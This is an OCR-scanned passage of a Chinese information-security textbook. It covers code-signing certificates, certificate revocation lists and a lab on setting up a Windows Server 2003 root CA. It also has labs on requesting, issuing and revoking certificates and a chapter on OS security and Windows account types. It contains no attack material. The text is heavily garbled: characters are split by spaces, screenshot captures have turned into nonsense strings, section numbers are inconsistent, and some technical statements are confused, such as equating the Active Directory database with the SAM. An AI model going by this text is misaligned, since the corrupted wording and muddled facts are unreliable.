的 身份 信息 、 公 钥 及 CA 的 签名 。 软 件 提供 人 使 用 代码 签名 证 书 对 软件 进行 签名 后 放 到 
Internet. 上 , 当 用 户 在 Internet. 上 下 载 该 软件 时 将 会 得 到 提示 ,从 而 可 以 确信 : 软件 的 来 源 ; 
软件 自 签名 后 到 下 载 前 ,没有 遭 到 修改 或 破坏 。 代 码 签 名 证 书 可 以 对 32-bit. exe、. cab, 
. ocx,. class 等 程序 和 文件 进行 签名 。 


3. 证 书 的 撤销 列表 


证 书 的 撤销 列表 是 一 个 被 签署 的 列表 , 它 指定 了 一 套 证 书 发 布 者 认为 无 效 的 证 书 。 除 
了 普通 CRL 外 ,还 定义 了 一 些 特殊 的 CRL 类 型 用 于 覆盖 特殊 领域 的 CRL. CRL 一 定 是 被 
CA 所 签署 的 ,可 以 使 用 与 签发 证 书 相同 的 私 钥 , 也 可 以 使 用 专门 的 CRL 签发 私 钥 。CRL 
中 包含 了 被 吊销 证 书 的 序列 号 。 


43 Windows Server 2003 证 书 服 务 


“证 书 服务 "是 Windows Server 2003 操作 系统 的 核心 部 分 , 它 允 许 企业 自己 担当 其 自 
己 的 CA。 此 服务 需要 证 书 服务 器 正常 发 挥 其 功能 ,这 些 服务 可 以 用 来 为 应 用 程序 发 布 和 
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管理 数字 证 书 , 例 如 “安全 /多 用 途 Internet 邮件 扩展 ”(s/mime) , ssl, efs, ipsec 和 智能 卡 登 
录 等 。Windows Server 2003 支持 多 个 级 别 的 CA 层次 ,以 及 交叉 认证 信任 网 络 , 包 括 离线 
和 在 线 CA。 

证 书 服务 是 基于 Web 服务 提供 的 ,所 以 先 安装 Web 服务 器 再 安装 证 书 服务 器 。 


4.3.1 配置 Web 服务 器 


在 Windows Server 2003 中 打开 控制 面板 , 单 击 “ 添 加 /删除 程序 ”按钮 ,在 弹出 的 对 话 
框 中 选择 “添加 /删除 Windows 组 件 ”, 在 向 导 对 话 框 中 选中 “Internet 信息 服务 (IIS)”, 然 后 
单 击 “ 下 一 步 ” 按 钮 , 按 向 导 指示 ,完成 对 TIS 的 安装 。 

服务 器 IP 地 址 为 192. 168. 0. 53 ,如 图 4-18 一 图 4-20 所 示 三 步 完 成 。 


图 4-19 IIS 安装 第 二 步 


图 4-20 IIS 安装 第 三 步 
Web 服务 器 配置 完成 ,下 面 配 置 证 书 服务 器 。 
4.3.2 配置 证 书 服务 器 


基于 Windows 的 CA 支持 4 种 类 型 : 企业 根 CA 企业 从 属 CA、 独 立根 CA、 独立 从 属 
CA。 其 中 ,独立 根 CA 是 证 书 层次 结构 中 的 最 高 级 CA。 独 立根 CA 既 可 以 是 域 的 成 员 也 
可 以 不 是 ,因此 它 不 需要 AD, 但 是 ,如 果 存在 AD 用 于 发 布 证 书 和 证 书 吊销 列表 , 则 会 使 用 
AD, 由 于 独立 根 CA 不 需要 AD, 因 此 可 以 很 容易 地 将 它 从 网 络 上 断 开 并 置 于 安全 的 区 域 ， 
这 在 创建 安全 的 离线 根 CA 时 非常 有 用 。 

配置 独立 根 CA 证 书 服务 器 ,名 称 root-ca, 需 要 从 图 4-21 至 图 4-28 多 步 完 成 。 


图 4-21 独立 根 CA 配置 第 一 步 


A 
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Windows fiti? 


图 4-24 独立 根 CA 配置 第 四 步 


证 书 服务 器 配置 完毕 。 在 本 章 实 训 部 分 ,介绍 如 何 使 用 证 书 和 管理 证 书 。 
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图 4-25 独立 根 CA 配置 第 五 步 


完成 “Windows 组 件 向 导 ” 


您 已 成 功 地 完成 了 Wiadows HAG. 


要 关闭 此 向 导 ， 请 单 击 “ 完 成 ”。 


图 4-26 独立 根 CA 配置 第 六 步 


图 4-27 独立 根 CA 配置 第 七 步 


rosoft Root A. 
Boot Agency 
Class 1 Public P. 
Class 2 Public P. 


Class 3 Public P. 


4-28 独立 根 CA 配置 第 八 步 
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. 密码 学 的 基本 功能 是 什么 ? 

. 简 述 DES 算法 的 基本 工作 原理 。 

. 简 述 RSA 算法 的 基本 工作 原理 。 

. 简 述 DES 和 RSA 的 混合 加 密 过 程 。 

. 简 述 PKI 的 定义 及 功能 。 

. 简 述 CA 的 定义 和 组 成 。 

. 数字 证 书 有 哪些 类 型 ? 

. 什么 是 独立 根 CA? 

. Windows Server 2003 中 如 何 配置 证 书 服务 ? 


4.1 使 用 证 书 


【 实 训 目 的 】 

(1) 掌握 向 CA 申请 证 书 的 过 程 。 

(2) 为 客户 机 浏览 器 下 申请 证 书 。 

【 实 训 环 境 】 

(1) 一 台 安 装 有 Windows Server 2003 的 PC 作为 CA 服务 器 。 

(2) 一 台 安 装 有 Windows Server 2003( 或 Windows XP) 的 PC 作为 客户 机 。 
【 实 训 内 容 】 


1. 在 客户 机 ,通过 IE 向 Windows Server 2003 CA 申请 证 书 


o 00 -3 O» ch 9 Co to rc 


CD 在 客户 机 TE 浏览 器 中 连接 到 http; //192. 168. 0. 53/certsrv, 假 定 192. 168. 0. 53 
是 CA 服务 器 IP 地 址 ,如 图 4-29 所 示 。 


TX -TETE-TECUN CREER Y 
FL EPDEEERE! CECXT RKTOPYR LJ 


使 用 此 网 站 为 您 的 Web 浏览 器 ， 电 子 邮件 客户 端 或 其 他 程序 申请 一 个 证 书 。 
通过 使 用 证 书 ， 您 可 以 向 遂 过 Web 通信 的 人 确认 您 的 身份 签署 并 加密 邮 ” 
件 ， 并 且 ， 根 据 您 申请 的 证 书 的 类 型 ， 执 行 其 他 安全 任务 


I ED et CONEY, 证 书 链 ， 或 证 书 吊销 列表 
， 或 查看 挂 起 的 申请 的 状 


有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . 
选择 一 个 任务 : 
申请 一 个 证 


书 
查看 挂 起 的 证 书 申请 的 状态 
工 载 一 个 CA 证 书 ， 证 书 链 或 CRL 


z 
jme FT TTT mes 7 
图 4-29 选择 任务 
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(2) 单 击 * 申 请 一 个 证 书 ”, 选 择 " Web 浏览 器 证 书 ”, 单 击 ,显示 如 图 4-30 — Bl 4-32 
所 示 。 


CREE 如 | 站" 总 国 


j (Æ) http://192 168.0. 53/ certsrv/ certrabi. asp?type=0 d 


Web 浏览 器 证 书 - 识别 信息 


要 完成 您 的 证 书 ， 在 下 面 的 框 中 输入 要 求 的 信息 。 
姓名 : ishuantan | 
电子 邮件 : hbi@i2cm | 


公司 : |hacz 
880: [og 


图 4-31 Web 浏览 器 证 书 识别 信息 


2. CA 颁发 证 书 


(1) 在 CA 服务 器 中 查看 * 挂 起 的 申请 ”证书 ID 号 为 2, 如 图 4-33 所 示 。 
(2) 选择 * 挂 起 的 申请 ”~”ID 号 为 2” 命 令 , 右 击 ,在 弹出 的 快捷 菜单 中 选择 “所 有 任务 ”> 
“颁发 "命令 ,打开 “颁发 的 证 书 ” 对 话 框 ,如 图 4-34 所 示 。 
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证 书 挂 起 
SEN AFDAK. (E, BLAFFEN GARANE 


您 的 申请 Id 为 2。 
请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 
注意 : 您 必须 用 此 Web 浏览 器 在 10 天 内 返回 以 检索 您 的 证 书 


as o  TTTTT Mme ,; 
图 4-32 证 书 申请 完成 


图 433 证 书 ID 


3. 客户 端 下 载 证 书 


CD 客户 端 : http://192. 168. 0. 53/certsrv, 如 图 4-35 所 示 。 
(2) 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 ”, 如 图 4-36 所 示 为 证 书 申请 的 状态 。 


E EBRR 


e» omla Belem 4 — | 


6133b... 2011-8-28 1 2012-8-28 1... 


图 4-34 颁发 证 书 


(3) Sii" Web 浏览 器 证 书 ”, 显 示 如 图 4-37 所 示 的 “证 书 已 颁发 ”。 

(4) 单 击 "安装 此 证 书 ”, 单 击 “ 是 ”, 如 图 4-38 所 示 。 

(5) 在 弹出 的 如 图 4-39 所 示 的 “安全 性 警告 ”对话 框 中 单 击 “ 是 ”按钮 。 

(6) 证 书 已 安装 ,在 浏览 器 中 ,选择 “Internet 选项 "命令 ,打开 “证 书 ” 和 “个 人 ”对 话 框 ， 
证 书 如 图 4-40 所 示 。 


第 4 章 
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| 地 址 四 ) le http: //192. 168.0. 53/certsrv/ El 


使 用 此 网 站 为 您 的 Web 浏览 器 ， 电 子 邮 件 客户 端 或 其 他 程序 申请 一 个 
证 书 。 通 过 使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 您 的 身份 ， 签 
署 并 加 密 邮 件 ， 并 且 ， 根 据 您 申请 的 证 书 的 类 型 ， 执 行 其 他 安全 任务 。 


a CREE, 证 书 链 ， 或 证 书 吊销 
列表 (CRL)， 或 查看 挂 起 的 申请 的 状态 。 


有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . 


选择 一 个 任务 : 
请 一 个 证 书 
查看 挂 起 的 证 书 申请 的 状态 


下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 


en http://192, 168.0, 53/ certsrv/certekpn. asp 


Kicrosoft 证 书 服务 — hacz 
EÉSEEBWSRHERE 000000000000 


请 选择 您 要 查看 的 证 书 申请 : 
Web 浏览 器 证 书 (2011 年 8 月 28 日 9:49:24) 


Kicrosoft 


证 书 已 颁发 
您 申请 的 证 书 已 颁发 给 您 。 


Ertis 


[SEI [EE E E i j 
图 4-37 证 书 已 颁发 
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您 申请 的 证 书 已 颁发 给 您 。 


Ezeket 
洪 在 的 脚本 冲突 


À 


图 4-38 安装 证 书 


您 的 新 证 书 已 经 成 功 安装 。 


图 4-40 证 书 已 安装 
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E440 (2D 
[ 实 训 4.2 管理 证 书 
【 实 训 目 的 】 
掌握 证 书 的 管理 功能 : 挂 起 、 颁 发 ,吊销 ,失效 。 
【 实 训 环境 ] 


(D 一 台 安 装 有 Windows Server 2003 的 PC 作为 CA 服务 器 。 

(2) 一 台 安 装 有 Windows Server 2003( 或 Windows XP) 的 PC 作为 客户 机 。 

【 实 训 内 容 】 

HE 、 颁 发 功能 在 实 训 4. 2 已 练习 ,本 实 训 练习 吊销 证 书 。 

(1) CA 服务 器 端 ,打开 证 书 颁发 机 构 , 选 择 “ 颁 发 的 证 书 ”>“ID 为 2”>“ 所 有 任务 ”一 
“吊销 证 书 ” 命 令 ,实现 证 书 吊销 ,如 图 4-41 所 示 。 


图 4 和 吊销 证 书 
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(2) 单 击 “ 吊 销 的 证 书 ”, 看 到 ID 为 2 的 证 书 已 被 吊销 ,如 图 4-42 所 示 。 


n 2011-6-... 2011-6-28 1... 未 指定 PODOBAAIV... -—-BEGI 


442 已 经 被 吊销 的 证 书 ID 2 


操作 系统 安全 | 


操作 系统 安全 是 信息 系统 安全 的 基础 ,本 章 介绍 操作 系统 的 基本 安全 机 制 、Windows 
Server 2003 的 安全 机 制 、Linux 的 安全 机 制 ; 重点 介绍 Windows Server 2003 的 账户 安全 、 
文件 系统 安全 .主机 安全 ,Linux 账户 安全 ,文件 系统 安全 。 


€i 操作 系统 安全 机 制 


操作 系统 作为 计算 机 系统 核心 的 系统 软件 ,负责 控制 和 管理 计算 机 系统 资源 。 因 此 , 操 
作 系 统 的 安全 对 于 整个 计算 机 系统 的 安全 性 起 着 基础 性 的 作用 。 与 过 去 相 比 ,现代 操作 系 
统 性 能 更 先进 ,功能 更 丰富 ,但 存在 不 少 的 安全 漏洞 或 后门 ”, 并 且 操 作 系 统 的 默认 安全 设 
置 很 容易 受到 攻击 。 因 此 ,要 减少 这 些 安全 漏洞 或 “后 门 ” 对 计算 机 系统 的 威胁 ,就 必须 对 操 
作 系 统 予 以 合理 配置 ,管理 和 监控 。 

操作 系统 不 安全 的 主要 原因 是 操作 系统 结构 体制 的 缺陷 。 对 操作 系统 构成 的 威胁 主要 
有 计算 机 病毒 ,特洛伊 木马 ,隐秘 通道 和 天 窗 等 。 一 个 可 靠 有 效 的 操作 系统 必须 具有 很 强 的 
安全 性 ,并 且 能 够 采取 相应 的 保护 措施 来 防范 这 些 威胁 。 操 作 系统 所 具有 的 安全 机 制 应 包 
括 身份 认证 ,访问 控制 .权限 管理 .内 存 保护 、 文 件 保护 、 安 全 审计 等 。 


5.1.1 身份 认证 机 制 


身份 认证 (authentication) 是 证 明 某 人 或 某 个 对 象 身份 的 过 程 , 是 保证 系统 安全 的 重要 
措施 。 身 份 认证 需要 用 一 个 标识 (identification) 来 表示 用 户 的 身份 。 将 用 户 标识 和 用 户 联 
系 的 过 程 称 为 认证 。 操 作 系统 的 许多 保护 措施 大 都 基于 认证 系统 的 合法 用 户 , 身 份 认证 是 
操作 系统 中 相当 重要 的 一 个 方面 ,也 是 用 户 获 取 权 限 的 关键 。 


5.1.2 访问 控制 机 制 


访问 控制 技术 是 计算 机 安全 领域 一 项 传统 的 技术 ,其 基本 任务 就 是 防止 非法 用 户 进入 
系统 及 合法 用 户 对 系统 资源 的 非法 使 用 。 

常见 的 访问 控制 机 制 主要 有 以 下 几 种 。 

(1) 自主 访问 控制 (discretionary access control,DAC) ,根据 用 户 的 身份 及 允许 访问 权 
限 决定 其 访问 操作 。 在 这 种 机 制 下 ,文件 的 拥有 者 可 以 指定 系统 中 的 其 他 用 户 ( 或 用 户 组 ) 
对 其 文件 的 访问 权 。 这 种 访问 控制 机 制 的 灵活 性 高 ,被 大 量 采用 。 然 而 ,也 正 是 由 于 这 种 灵 
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活性 使 信息 安全 性 能 降低 。 

(2) 强制 访问 控制 (mandatory access control, MAC) , 指 用 户 与 文件 都 有 一 个 固定 的 安 
全 属性 ,系统 用 该 安全 属性 来 决定 一 个 用 户 是 否 可 以 访问 某 个 文件 。 安 全 属性 是 强制 性 的 
规定 , 它 由 安全 管理 员 或 操作 系统 根据 限定 的 规则 确定 ,用 户 或 用 户 的 程序 不 能 加 以 修改 。 
如 果 系 统 认为 具有 某 个 安全 属性 的 用 户 不 适 于 访问 某 个 文件 ,那么 任何 人 (包括 文件 的 拥有 
者 ) 都 无 法 使 该 用 户 具 有 访问 该 文件 的 权力 。 

(3) 基于 角色 的 访问 控制 (role-based access control,RBAC)。RBAC 解决 了 具有 大 量 
用 户 数据 客体 和 访问 权限 的 系统 中 授权 管理 问题 。RBAC 在 满足 企业 信息 系统 安全 需求 
方面 显示 了 极 大 的 优势 ,有 效 地 克服 了 传统 访问 控制 技术 存在 的 不 足 , 可 以 减少 授权 管理 的 
复杂 性 并 降低 管理 开销 ,为 管理 员 提 供 一 个 比较 好 的 安全 策略 实现 环境 。 其 优点 主要 体现 
dE: 角色 和 会 话 设置 带 来 的 好 处 是 容易 实施 最 小 特权 原则 ; 相 较 于 个 体 授权 ,将 若干 特定 
用 户 集合 与 某 种 授权 连接 在 一 起 的 授权 管理 ,具有 更 强大 的 可 操作 性 和 可 管理 性 ; 系统 的 
最 终 用 户 并 没有 与 数据 对 象 有 直接 的 联系 ,而 是 通过 角色 这 个 中 间 层 来 访问 后 台数 据 信息 ; 
在 应 用 层次 上 ,角色 的 逻辑 意义 和 划分 更 为 明显 和 直接 。 


5.1.3 最 小 特权 管理 机 制 


最 小 特权 (least privilege) 是 指 在 完成 某 种 操作 时 赋予 每 个 主体 (用 户 或 进程 ) 必 不 可 少 
的 特权 。 最 小 特权 原则 一 方面 给 予 主体 * 必 不 可 少 ” 的 特权 ,保证 了 所 有 的 主体 能 在 所 赋予 
的 特权 之 下 完成 所 需要 完成 的 任务 或 操作 ; 另 一 方面 , 它 只 给 予 主体 * 必 不 可 少 ” 的 特权 ,从 
而 限制 了 每 个 主体 所 能 进行 的 操作 ,确保 由 于 可 能 的 事故 、 错 误 、 网 络 部 件 的 算 改 等 原因 造 
成 的 损失 最 小 。 

常见 的 最 小 特权 管理 机 制 有 基于 文件 的 特权 机 制 和 基于 进程 的 特权 机 制 等 。 


5.1.4 可 信和 通路 机 制 


可 信和 通路 (trust path) 是 终端 人 员 能 借以 直接 同 可 信 计 算 基 (trusted computing base. 
TCB) 通 信 的 一 种 机 制 。 可 信 通 路 机 制 只 能 由 有 关 终端 人 员 或 可 信 计 算 基 启动 ,并且 不 能 被 
不 可 信和 软件 模仿 。 可 信 通 路 机 制 主要 应 用 在 用 户 登录 或 注册 时 ,能 够 保证 用 户 确实 是 和 安 
全 核心 通信 ,防止 不 可 信和 进程 (如 特洛伊 木马 等 ) 模 拟 系统 的 登录 过 程 而 窃取 口令 。 


5.1.5 隐蔽 通道 的 分 析 与 处 理 


隐蔽 通道 是 指 系统 中 利用 那些 本 来 不 是 用 于 通信 的 系统 资源 绕 过 强制 访问 控制 进行 非 
法 通信 的 一 种 机 制 。 系 统 内 充满 着 隐蔽 通道 。 对 于 系统 中 的 每 一 个 信息 比特 ,如 果 它 能 由 
一 个 进程 修改 而 由 另 一 个 进程 读 取 ( 直 接 或 间接 ), 那 它 就 是 一 个 潜在 的 隐蔽 通道 。 


5.1.6 安全 审计 机 制 


审计 为 系统 进行 事故 原因 的 查询 ,定位 ,事故 发 生前 的 预测 ,报警 ,以 及 事故 发 生 之 后 的 
实时 处 理 , 提 供 详细 可 靠 的 依据 和 支持 ,以 便 有 违反 系统 安全 规则 的 事件 发 生 后 能 够 有 效 
地 追查 事件 发 生 的 地 点 和 过 程 。 
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操作 系统 必须 能 够 生成 、 维 护 及 保护 审计 过 程 , 防 止 其 被 非法 修改 .访问 和 毁坏 ,特别 是 
要 保护 审计 数据 ,严格 限制 未 经 授权 的 用 户 访问 。 一 个 安全 操作 系统 的 审计 机 制 就 是 对 系 
统 中 有 关 安 全 的 活动 进行 记录 检查 及 审核 , 它 的 主要 目的 就 是 检测 和 阻止 非法 用 户 对 计算 
机 系统 的 人 侵 ,并 显示 合法 用 户 的 误 操作 。 审 计 作为 安全 系统 的 重要 组 成 部 分 ,在 可 信 计 算 
机 系统 评价 准则 (trusted computer system evaluation criteria,TCSEC) 中 要 求 C2 级 以 上 的 
安全 操作 系统 必须 包含 审计 功能 。 


6.2 Windows 操作 系统 安全 


Windows Server 2003 是 微软 公司 在 Windows NT 技术 基础 上 推出 的 操作 系统 ,目前 
已 成 为 广大 中 小 企业 网 络 服务 器 的 首选 系统 平台 。Windows 系统 的 安全 模型 包括 信任 域 
控制 器 .身份 认证 、 服 务 之 间 的 信任 委派 以 及 基于 对 象 的 访问 控制 。Windows 安全 服务 的 
核心 功能 包括 活动 目录 (active directory, AD) 服 务 、 对 公 钥 基础 设施 PKI 的 集成 支持 、 对 
Kerberos V5 鉴别 协议 的 支持 ,保护 本 地 数据 的 加 密 文件 系统 (encrypted files system, EFS) 
和 使 用 Internet 安全 协议 (IPSec) 来 支持 公共 网 络 上 的 安全 通信 等 。 

CD 活动 目录 服务 。 活 动 目录 服务 在 Windows 信息 安全 和 网 络 安全 中 具有 重要 作用 ， 
它 是 关于 用 户 、 硬 件 . 应 用 和 网 络 数据 的 存储 中 心 ,同时 还 存储 用 户 的 鉴别 信息 .用户 使 用 某 
一 资源 的 授权 信息 等 。Windows 系统 的 安全 模型 正 是 建立 在 活动 目录 结构 之 上 ,提供 域 间 
信任 关系 组 策略 安全 管理 .身份 认证 和 访问 控制 ,管理 委派 等 安全 性 服务 。 

(2) 认证 服务 。Windows 使 用 Kerberos V5 作为 网 络 用 户 身份 认证 的 主要 方法 。 
Kerberos 协议 提供 在 客户 机 和 应 用 服务 器 之 间 建 立 连接 之 前 的 相互 身份 认证 的 机 制 。 

在 使 用 Kerberos 协议 前 ,所 有 客户 机 和 服务 器 都 要 向 Kerberos 身份 认证 服务 器 注册 。 
使 用 Kerberos 身份 认证 协议 时 ,客户 端 将 由 用 户 密码 派生 的 加 密 信息 发 送 到 Kerberos 服 
务 器 ,该 服务 器 使 用 它 来 验证 用 户 的 身份 。 同 样 ,服务 器 也 将 相关 信息 发 送 到 客户 端的 
Kerberos 软件 ,以 验证 服务 器 的 身份 。 这 种 交互 身份 验证 过 程 可 同时 避免 客户 机 和 服务 器 
被 恶意 用 户 欺骗 。 

Windows 操作 系统 全 面 支持 PKI, 并 作为 操作 系统 的 一 项 基本 服务 而 存在 。 组 成 
Windows PKI 的 基本 J 逻辑 组 件 中 的 核心 是 微软 证 书 服务 系统 (Microsoft certificate 
service), 它 允许 用 户 配置 一 个 或 多 个 企业 CA( 认 证 机 构 )。 这 些 CA 支持 证 书 的 分 发 ,管理 
和 撤销 ,并 与 活动 目录 和 策略 配合 ,共同 完成 证 书 和 废止 信息 的 发 布 。 

(3) 加 密 文件 系统 。 加 密 文件 系统 (EFS) 是 Windows Server 2003 的 NTFS 文件 系统 
的 一 个 组 件 ,能 够 让 用 户 对 本 地 计算 机 中 的 文件 或 文件 夹 进行 加 密 , 非 授权 用 户 不 能 对 这 些 
加 密 文件 进行 读 写 操作 。EFS 可 以 和 Windows PKI 集 成 ,并 提供 在 用 户 私 钥 丢失 情况 下 对 
数据 进行 恢复 的 功能 。 

当 使 用 EFS 对 NTFS 文件 系统 的 文件 或 文件 夹 进行 安全 处 理 时 ,操作 系统 将 使 用 
CryptoAPI 所 提供 的 公 钥 和 对 称 密 钥 加 密 算 法 对 文件 或 文件 夹 进行 加 密 。EFS 在 保护 文 
件 时 自动 对 其 进行 加 密 , 并 且 在 用 户 再 次 打开 文件 时 解密 。 除 了 加 密 文 件 的 人 和 具有 EFS 
文件 恢复 证 书 的 管理 员 之 外 ,没有 人 可 以 读 取 这 些 文件 。 由 于 加 密 机 制 已 经 内 置 于 文件 系 
统 中 ,管理 员 和 用 户 使 用 起 来 是 非常 简单 的 。 
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(4) 安全 模板 。 安 全 模板 是 安全 配置 的 实际 体现 , 它 是 一 个 可 以 存储 一 组 安全 设置 的 
文件 。Windows 包含 一 组 标准 安全 模板 ,模板 适用 的 范围 从 低 安全 性 域 客 户 端 设置 到 高 安 
全 人 性 域 控制 器 设置 。 这 些 模 板 可 以 直接 应 用 、 修 改 或 作为 创建 用 户 自 定 义 安 全 模板 的 基础 。 
“安全 配置 "和 “分 析 ” 工 具 是 “安全 模板 "管理 单元 所 附带 的 ,用 于 将 定义 在 安全 模板 中 的 设 
置 应 用 到 实际 系统 中 ,还 可 以 用 于 分 析 系 统 的 安全 性 并 与 计算 机 上 已 经 部 署 的 设置 进行 比 
较 , 以 确保 它们 符合 组 织 标准 。Windows 提供 了 安全 模板 工具 , 它 可 以 方便 地 组 织 网 络 安 
全 设置 的 建立 和 管理 。 管 理 员 使 用 微软 管理 控制 台 (Microsoft management console， 
MMC) 可 以 很 容易 定义 标准 模板 ,并 统一 地 应 用 到 多 个 计算 机 或 用 户 中 。 

(5) 安全 账户 管理 器 。Windows 对 用 户 账户 的 安全 管理 使 用 安全 账户 管理 器 (security 
account manager , SAM) , 它 是 Windows 的 用 户 账户 数据 库 , 所 有 用 户 的 登录 名 及 口令 等 相 
关 信 息 都 会 保存 在 这 个 文件 中 。Windows 系统 对 SAM 文件 中 的 资料 全 部 进行 加 密 处 理 ， 
一 般 的 编辑 器 不 能 直接 读 取 这 些 信息 。 

SAM 对 账户 的 管理 是 通过 安全 标识 符 来 实现 的 ,安全 标识 符 在 账户 创建 时 同时 创建 。 
安全 标识 符 是 唯一 的 ,即使 是 相同 的 用 户 名 ,在 每 次 创建 时 获得 的 安全 标识 符 也 完全 不 同 。 
因此 ,一 旦 某 个 账户 被 删除 , 它 的 安全 标识 符 就 不 再 存在 了 ,即使 使 用 相同 的 用 户 名 重建 账 
户 , 也 会 被 赋予 不 同 的 安全 标识 符 ,不 会 保留 原来 的 权限 。 

(6) 支持 IPSec 协议 。 为 了 保护 通过 网 络 的 数据 ,并 保持 对 用 户 和 应 用 的 完全 透明 ， 
Windows 使 用 IPSec WX. IPSec 提供 了 认证 ,加 密 .数据 完整 性 和 TCP/IP 数据 的 过 滤 功 
fÉ. IPSec 协议 工作 在 网 络 的 IP 层 ,提供 了 端 到 端的 安全 服务 。 

(7) 可 扩展 的 安全 体系 结构 。 为 了 提供 与 现 有 客户 端的 兼容 并 利用 特殊 的 安全 机 制 ， 
Windows 操作 系统 提供 了 对 安全 扩展 性 的 支持 ,此 项 功能 称 为 安全 性 支持 供应 商 接口 
(security support provider interface,SSPI) 。 使 用 SSPI 可 确保 在 基于 Windows 环境 中 实 
现 一 致 的 安全 性 。SSPI 为 客户 /服务 器 双方 的 身份 认证 提供 了 上 层 应 用 API, 屏 项 了 网 络 
安全 协议 的 实现 细节 ,大 大 减少 了 为 支持 多 方 认证 需要 实现 协议 的 代码 量 。 

(8) 安全 审核 。Windows 包含 了 安全 性 审核 功能 ,允许 用 户 监视 与 安全 性 相关 的 事件 
(如 失败 的 登录 尝试 ), 因 此 ,可 以 检测 到 供给 者 和 试图 危害 系统 数据 的 事件 。 在 Windows 
审核 事件 类 型 中 ,最 常见 的 有 对 对 象 的 访问 (如 文件 和 文件 夹 )、 用 户 和 组 账户 的 管理 ,用 户 
登录 和 注销 的 事件 等 。 除 了 审核 与 安全 性 相关 的 事件 外 ,Windows 还 产生 安全 性 日 志 , 并 
提供 查看 日 志 中 所 报告 安全 性 事件 的 方法 。 


5.2.1 Windows Server 2003 账户 安全 


使 用 Windows Server 2003 操作 系统 ,必须 具备 合法 账户 ,才能 登录 到 服务 器 ,访问 网 
络 上 的 资源 。 基 于 Internet 的 非法 入 侵 也 是 从 寻找 账户 的 漏洞 开始 的 。 


1. 账户 种 类 


账户 是 Windows Server 2003 网 络 中 的 一 个 重要 组 成 部 分 ,账户 代表 着 需要 访问 网 络 
资源 的 账户 。 从 某 种 意义 上 说 ,账户 就 是 网 络 世界 中 用 户 的 身份 证 。Windows Server 2003 
网 络 依靠 账户 来 管理 用 户 ,控制 用 户 对 资源 的 访问 ,每 一 个 需要 访问 网 络 的 用 户 都 要 有 一 个 
账户 。Windows Server 2003 所 支持 的 用 户 分 为 两 种 主要 的 账户 类 型 : 域 用 户 账 户 和 本 地 
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用 户 账户 。 除 此 之 外 ,还 有 内 置 的 用 户 账户 。 

1) 域 用 户 账户 

域 用 户 账户 是 用 户 访问 域 的 唯一 凭证 ,因此 在 域 中 必须 是 唯一 的 。 域 用 户 账户 在 域 控 
制 器 上 建立 ,作为 活动 目录 的 一 个 对 象 保存 在 域 的 数据 库 中 。 用 户 在 域 中 的 任何 一 台 计 算 
机 登录 到 域 中 的 时 候 必须 提供 一 个 合法 的 域 用 户 账户 ,该 账户 将 被 域 控制 器 所 验证 。 

保存 域 用 户 账户 数据 库 (AD, 活 动 目 录 ) 叫 作 安全 账户 管理 器 (security accounts 
manager. SAM) ,该 数据 库 位 于 域 控 制 器 上 的 \%systemroot%\NTDSANTDS. DIT 文件 
中 。 为 了 保证 账户 在 域 中 的 唯一 性 ,每 个 账户 都 被 Windows Server 2003 签订 一 个 唯一 的 
SID(security identifier, 安 全 识别 符 )。SID 将 成 为 一 个 账户 的 属性 ,不 随 账户 的 修改 .更 名 
而 改动 ,并且 一 旦 账户 被 删除 ,SID 也 将 不 复 存 在 ,即便 重新 创建 一 个 一 模 一 样 的 账户 ,其 
SID 也 不 会 和 原 有 的 SID 一 样 ,对 于 Windows Server 2003 而 言 ,这 就 是 两 个 不 同 的 账户 。 
在 Windows Server 2003 中 系统 实际 上 是 利用 SID 来 对 应 用 户 权 限 的 ,因此 只 要 SID A fü]. 
新 建 的 账户 就 不 会 继承 原 有 的 账户 的 权限 与 组 的 隶属 关系 。 

2) 本 地 用 户 账户 

当 Windows Server 2003 工作 在 “工作 组 ”模式 下 或 者 作为 域 中 的 成 员 服务 器 时 ,在 计 
算 机 操作 系统 中 存在 的 是 本 地 用 户 和 本 地 组 。 本 地 用 户 账户 的 作用 范围 仅 限于 在 创建 该 账 
户 的 计算 机 上 ,以 控制 用 户 对 该 计算 机 上 的 资源 的 访问 。 所 以 当 需 要 访问 在 “工作 组 "模式 
下 的 计算 机 时 ,必须 在 每 一 个 需要 访问 的 计算 机 上 都 有 其 本 地 账户 。 其 中 本 地 账户 都 存储 
在 %SystemRoot%\system32\config\Sam 数据 库 中 。 这 些 账户 在 存放 该 账户 的 计算 机 上 
必须 是 唯一 的 。 

由 于 本 地 用 户 账户 的 验证 是 由 创建 该 账户 的 计算 机 来 进行 的 ,因此 对 于 这 种 类 型 账户 
的 管理 是 分 散 的 。 通 常 不 建议 在 成 员 服 务 器 和 基于 Windows XP 的 计算 机 上 建立 本 地 用 户 
账户 。 这 些 账户 不 能 在 域 环 境 中 统一 管理 .设置 和 维护 ,并 且 使 用 这 种 类 型 账户 的 用 户 在 访 
问 域 的 资源 时 还 要 再 提供 一 个 域 用 户 账 户 , 同 时 要 经 过 域 控制 器 的 验证 。 这 些 都 使 得 本 地 
用 户 账户 不 适用 在 域 的 环境 下 ,并 且 也 容易 造成 安全 隐患 。 因 此 ,应 当 在 域 的 环境 中 只 使 用 
域 用 户 账户 。 本 地 用 户 账户 适用 于 工作 组 模式 中 ,该 模式 中 没有 集中 的 网 络 管理 者 ,必须 由 

台 计 算 机 自己 维护 账户 和 资源 。 

与 域 用 户 账户 一 样 ,本 地 用 户 账户 也 有 一 个 唯一 的 SED 来 标志 账户 ,并 记录 账户 的 权 
限 和 组 的 隶属 关系 。 

3) 内 置 的 用 户 账户 

内 置 的 用 户 账 户 是 Windows Server 2003 操作 系统 自 带 的 账户 ,在 安装 好 Windows 
Server 2003 之 后 ,这 些 账 户 就 存在 了 ,并 已 经 被 赋予 了 相应 的 权限 。Windows Server 2003 
利用 这 些 账 户 来 完成 某 些 特定 的 工作 。Windows Server 2003 最 常见 的 内 置 用 户 账户 包括 
Administrator 和 Guest。 这 些 内 置 账户 不 允许 被 删除 ,并 且 Administrator 账户 也 不 允许 被 
屏蔽 ,但 内 置 账户 允许 被 更 名 。 

(1) Administrator 账号 。Administrator( 管 理 员 ) 账 号 被 赋予 在 域 中 和 在 计算 机 中 具 
有 不 受 限 制 的 权力 ,该 账号 被 设计 用 于 对 本 地 计算 机 或 域 进行 管理 ,可 以 从 事 创 建 其 他 用 户 
